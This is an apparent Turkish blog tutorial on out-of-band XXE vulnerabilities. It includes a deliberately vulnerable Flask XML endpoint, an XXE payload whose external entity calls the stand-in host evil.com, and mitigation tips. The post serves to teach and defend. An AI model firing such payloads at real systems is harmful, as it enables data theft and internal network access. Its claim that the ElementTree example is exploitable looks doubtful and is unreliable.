OOB XXE Zafiyeti: Tanım, Riskler ve Uygulamalı Örnekler

OOB XXE (Out-Of-Band XML External Entity) Nedir?

Out-Of-Band XML External Entity (OOB XXE), bir XML işlemcisinin, dış kaynaklardan veri çekmesine izin veren bir güvenlik açığıdır. Bu zafiyet, XML dosyalarının içindeki dış kaynakları (örneğin, URL'ler) kullanarak, hassas bilgilerin sızdırılmasına, iç ağ kaynaklarına erişime veya kötü amaçlı komutların çalıştırılmasına yol açabilir.

OOB XXE'in Çalışma Prensibi

XML Verisinin Analizi: Uygulama, XML verilerini işlemek için bir XML işleyici kullanır. Bu işleyici, XML dosyalarında tanımlanan dış varlıkları (external entities) işleyebilir.
Dış Varlıkların Tanımlanması: XML verisinde dış varlıklar tanımlanabilir ve bu varlıklar, uzak bir sunucudan veri çekmek için kullanılabilir.
Veri Sızdırma: Eğer XML işleyici dış varlıkları destekliyorsa, uygulama bu varlıkları kullanarak hassas bilgileri dışarıya sızdırabilir.

OOB XXE’in Potansiyel Etkileri

Veri Sızdırma: Sunucudan hassas verileri dışa sızdırmak.
İç Kaynaklara Erişim: İç ağdaki kaynaklara veya servislerdeki bilgilere erişim sağlamak.
Hizmet Dışı Bırakma: Servisleri veya uygulamaları çökertmek veya performans sorunlarına yol açmak.

OOB XXE ile İlişkili Güvenlik Riskleri

OOB XXE, verilerin dış kaynaklara sızdırılması, iç ağdaki kaynaklara erişim sağlanması veya uygulamanın bozulmasına neden olabilir. Bu tür bir güvenlik açığı, özellikle hassas verileri işleyen uygulamalarda büyük riskler taşıyabilir.

Uygulamalı Örnek

Aşağıda, Python Flask tabanlı basit bir uygulamada OOB XXE zafiyetinin nasıl ortaya çıkabileceğini gösteren bir örnek bulunmaktadır.

1. OOB XXE Zafiyeti İçeren Basit Flask Uygulaması


                from flask import Flask, request, jsonify

                import xml.etree.ElementTree as ET



                app = Flask(__name__)



                @app.route('/parse', methods=['POST'])

                def parse_xml():

                    xml_data = request.data

                    try:

                        # XML verisini işleme

                        tree = ET.ElementTree(ET.fromstring(xml_data))

                        return jsonify({"status": "success"}), 200

                    except ET.ParseError as e:

                        return jsonify({"error": str(e)}), 500



                if __name__ == '__main__':

                    app.run(debug=True)

2. OOB XXE ile Dış Kaynaklara Erişim

Bu uygulama, XML verisini işlemek için ElementTree kullanır ve dış kaynakları kullanarak hassas verilerin sızdırılmasına neden olabilir. Örneğin:


                <?xml version="1.0"?>

                <!DOCTYPE foo [

                <!ELEMENT foo ANY>

                <!ENTITY xxe SYSTEM "http://evil.com/malicious" >

                ]>

                <foo>&xxe;</foo>

3. Potansiyel Riskler ve Önlemler

Güvenli XML İşleyiciler Kullanımı: Dış varlıkları işleyemeyen güvenli XML işleyicileri tercih edin.
XML Ayrıştırıcının Konfigürasyonu: XML ayrıştırıcının dış varlıkları işleme yeteneğini devre dışı bırakın.
Güvenlik Duvarları ve İzleme: Anormal etkinlikleri izlemek ve güvenlik loglarını takip etmek için güvenlik duvarları kullanın.
Güncellemeler ve Yamanlar: Yazılım ve kütüphaneleri düzenli olarak güncel tutarak bilinen güvenlik açıklarına karşı koruma sağlayın.

Ozan Agdepe

Bu Blogda Ara

OOB XXE (Out-of-Band XML External Entity) Zafiyeti: Tanım, Riskler ve Önlemler